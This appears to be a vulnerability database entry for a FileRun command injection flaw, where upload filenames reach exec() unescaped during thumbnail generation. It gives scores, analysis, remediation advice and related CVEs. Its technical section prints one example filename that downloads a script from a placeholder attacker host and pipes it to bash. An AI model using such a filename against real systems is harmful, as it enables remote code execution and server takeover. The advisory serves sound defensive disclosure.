Skip to main content

FileRun CVE-2026-14863

| EUVDEUVD-2026-56976 HIGH
OS Command Injection (CWE-78)
2026-08-11 VulnCheck GHSA-mcfq-hmcc-5pch
8.7
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Requires only a low-privilege authenticated session (PR:L) over the network (AV:N); no scope change as impact is confined to the vulnerable FileRun system (S:U).

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

2
Analysis Generated
Aug 11, 2026 - 21:40 vuln.today
CVE Published
Aug 11, 2026 - 20:41 cve.org
HIGH 8.7

DescriptionCVE.org

FileRun up to and including version 2026.2.0 contains an OS command injection vulnerability that allows authenticated attackers to achieve remote code execution by uploading a file with a malicious filename containing shell command substitution sequences. The thumbnail generation system passes filenames wrapped in shell double-quotes directly to exec() without escapeshellarg() sanitization, allowing filenames such as $(PAYLOAD).mp4 to survive the filename sanitizer and be evaluated as shell commands when ffmpeg, ImageMagick, vips, or stl-thumb processes the file during thumbnail generation.

AnalysisAI

Remote code execution in FileRun ≤2026.2.0 is achievable by any authenticated user who can upload files, exploiting a shell command injection flaw in the thumbnail generation pipeline. The subsystem passes uploaded filenames wrapped in double-quotes directly to exec() without escapeshellarg() sanitization, meaning filenames such as $(PAYLOAD).mp4 survive the filename sanitizer and are evaluated as shell commands when ffmpeg, ImageMagick, vips, or stl-thumb processes the upload. Vendor-released patch 2026.2.1 is available; no CISA KEV listing or public exploit code has been identified at time of analysis, but the low-complexity, authenticated-only barrier makes this a high-priority patch target for any FileRun deployment.

Technical ContextAI

FileRun is a self-hosted web-based file management and sharing platform. CWE-78 (Improper Neutralization of Special Elements used in an OS Command) describes the root cause: the thumbnail generation subsystem constructs shell invocations by embedding filenames inside double-quoted strings before passing them to exec(), rather than using escapeshellarg() or equivalent sanitization. In Unix-like shells, double-quoting preserves shell command substitution sequences such as $(...) and ..., so a filename like $(curl attacker.com/shell.sh|bash).mp4 is interpreted by the shell rather than treated as a literal string. The vulnerability is triggered by one of four external thumbnail tools - ffmpeg, ImageMagick, vips, or stl-thumb - whichever is installed and invoked for the uploaded file type. The CPE cpe:2.3:a:filerun:filerun:*:*:*:*:*:*:*:* covers all FileRun versions through 2026.2.0 with no platform restriction stated.

RemediationAI

Upgrade FileRun to version 2026.2.1, the vendor-confirmed patched release per the changelog at https://filerun.com/index.php/changelog?v=2026.2.1. If immediate upgrade is not feasible, disable thumbnail generation for uploaded files to prevent the vulnerable code path from executing - note that this will degrade media preview functionality for users. As an additional compensating control, restrict file upload privileges to the minimum set of trusted accounts, reducing the pool of users who can trigger the flaw; this does not eliminate the vulnerability but narrows the attack surface. Ensure the web server process runs under a dedicated low-privilege OS user account to limit the blast radius of any successful exploit. Further technical context on the flaw is available in the VulnCheck advisory at https://www.vulncheck.com/advisories/filerun-rce-via-thumbnail-generation-command-injection.

CVE-2017-14738 CRITICAL POC
9.8 Sep 30

FileRun (version 2017.09.18 and below) suffers from a remote SQL injection vulnerability due to a failure to sanitize in

CVE-2026-73694 HIGH POC
8.6 Sep 10

OS command injection in FileRun before 2026.3.0 enables a network-accessible superuser to execute arbitrary commands on

CVE-2022-30469 HIGH POC
8.8 Jun 06

In Afian Filerun 20220202, lack of sanitization of the POST parameter "metadata[]" in `/?module=fileman&section=get&page

CVE-2026-73693 HIGH POC
8.7 Sep 10

OS command injection in FileRun's PhotoProofSheet handler allows any authenticated user with upload permission to execut

CVE-2026-73698 HIGH POC
8.6 Sep 10

SQL injection in FileRun before 2026.3.0 allows delegated or simple administrators to escalate privileges to superuser a

CVE-2026-73699 HIGH POC
8.6 Sep 10

PHP object injection in FileRun before 2026.3.0 enables authenticated attackers with database write access to achieve re

CVE-2021-35504 HIGH POC
7.2 Oct 05

Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the ffmpeg binary

CVE-2021-35505 HIGH POC
7.2 Oct 05

Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the magick binary

CVE-2018-7735 HIGH POC
7.2 Mar 06

Afian FileRun (before 2018.02.13) suffers from a remote SQL injection vulnerability, when logged in as superuser, via th

CVE-2018-7734 HIGH POC
7.2 Mar 06

Afian FileRun (before 2018.02.13) suffers from a remote SQL injection vulnerability, when logged in as superuser, via th

CVE-2021-35506 MEDIUM POC
6.1 Oct 05

Afian FileRun 2021.03.26 allows XSS when an administrator encounters a crafted document during use of the HTML Editor fo

CVE-2021-35503 MEDIUM POC
6.1 Oct 05

Afian FileRun 2021.03.26 allows stored XSS via an HTTP X-Forwarded-For header that is mishandled when rendering Activity

Share

CVE-2026-14863 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy